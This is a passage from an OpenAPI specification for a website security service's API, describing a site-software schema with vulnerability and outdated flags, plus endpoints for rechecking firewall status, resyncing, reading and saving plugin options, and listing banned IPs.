                  plugins: { description: 'List of software of the site and its information.', type: array, items: { properties: { id: { description: 'Identifier of the software entry.', type: integer, example: 1 }, license_id: { description: 'Internal identifier.', type: integer, example: 12345 }, sw_type: { description: 'Software type', type: string, enum: [php, database, wordpress, core, plugin, theme, extension, module, drupal, joomla], example: php }, sw_name: { description: 'Name of the software.', type: string, example: PHP }, sw_cur_ver: { description: 'Current version, as reported by the site.', type: string, example: 7.4.3 }, sw_new_ver: { description: 'New version available, as reported by the site.', type: string, example: 7.4.3 }, created_at: { description: 'Creation time.', type: string, example: '2023-12-15T07:32:17.000000Z' }, updated_at: { description: 'Updated time.', type: string, example: '2023-12-15T07:32:17.000000Z' }, sw_key: { description: 'Full slug of the software.', type: string, example: null }, sw_active: { description: 'Active state of the software.', type: boolean, example: true }, sw_key_title: { description: 'Simple slug of the software.', type: string, example: null }, isVuln: { description: 'Vulnerability status of this software entry.', type: boolean, example: true }, isOutdated: { description: 'Outdated status of this software entry.', type: boolean, example: false } }, type: object } }
                type: object
              example:
                plugins:
                  - { id: 1, license_id: 12345, sw_type: database, sw_name: Database, sw_cur_ver: 10.6.16-MariaDB-log, sw_new_ver: '', created_at: '2023-11-08 14:00:29', updated_at: '2024-03-14 06:00:03', sw_key: null, sw_active: null, sw_key_title: null, sOutdated: false, isVuln: false }
                  - { id: 2, license_id: 12345, sw_type: php, sw_name: PHP, sw_cur_ver: 8.2.21, sw_new_ver: '', created_at: '2023-11-08 14:00:29', updated_at: '2024-03-14 06:00:03', sw_key: null, sw_active: null, sw_key_title: null, sOutdated: false, isVuln: false }
                  - { id: 3, license_id: 12345, sw_type: plugin, sw_name: 'Advanced Custom Fields', sw_cur_ver: 6.3.3, sw_new_ver: 6.3.4, created_at: '2023-11-08 14:00:29', updated_at: '2024-03-14 06:00:03', sw_key: advanced-custom-fields/acf.php, sw_active: 1, sw_key_title: advanced-custom-fields, sOutdated: true, isVuln: true }
  '/site/plugin/recheck/{site}':
    post:
      tags:
        - Sites
      summary: 'Check activation state'
      description: 'Recheck the firewall or plugin activation state of a site.'
      operationId: 8c07213d381d4d7c00cb7383452fec14
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: 1
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The firewall and plugin are both running on the site. Please refresh the page.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'The firewall is currently still disabled. / The plugin did not send a proper ping back to our API.'
  '/site/plugin/resync/{site}':
    post:
      tags:
        - Sites
      summary: 'Site software resync'
      description: 'Force a resync of the site.'
      operationId: 8312e41af888a4c5fb11ed8dccdfd1b4
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: 1
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'We have forced a resync of the site.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'We could not force a resync of the site (ERR 1). / We could not force a resync of the site (ERR 2).'
  '/site-management/{site}/get-options':
    post:
      tags:
        - Sites
      summary: 'Get plugin options'
      description: "Gets the options of the site based on the parameters that were provided in the request payload.\nIf the request payload is empty, it will return all settings of the site."
      operationId: 928070df689d005b52578154096f553a
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      requestBody:
        description: 'If request body empty, return all options. Otherwise, it will return the options of which the keys match.'
        required: false
        content:
          application/json: {  }
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                patchstack_firewall_ip_header: HTTP_X_FORWARDED_FOR
  '/site-management/{site}/save-options':
    post:
      tags:
        - Sites
      summary: 'Save plugin options'
      description: 'Saves the given options in the payload to the site,'
      operationId: 027e257bf17851530dc90fcbe6492f57
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      requestBody:
        description: 'The given parameters will be sent to the site for saving. E.g. patchstack_firewall_ip_header=HTTP_X_FORWARDED_FOR will set that key to the given value.'
        required: true
        content:
          application/json:
            schema:
              properties:
                PARAMETER_TO_UPDATE:
                  description: 'The dynamic parameter to update.'
                  type: string
                  example: PARAMETER_VALUE
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'Plugin options has been updated.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error:
                  message: 'We could not get a valid response from the website, contact support for further assistance./Connectivity error occured while trying to contact your website. Error: {ERROR}'
  '/site-management/{site}/get-bans':
    get:
      tags:
        - Sites
      summary: 'Get banned IP addresses'
      description: 'Retrieve the banned IP addresses that are currently banned on the site.'
      operationId: 8aafbe3f8c746d0df2bbdd060763908d
      parameters:
        -
          name: site
[...]
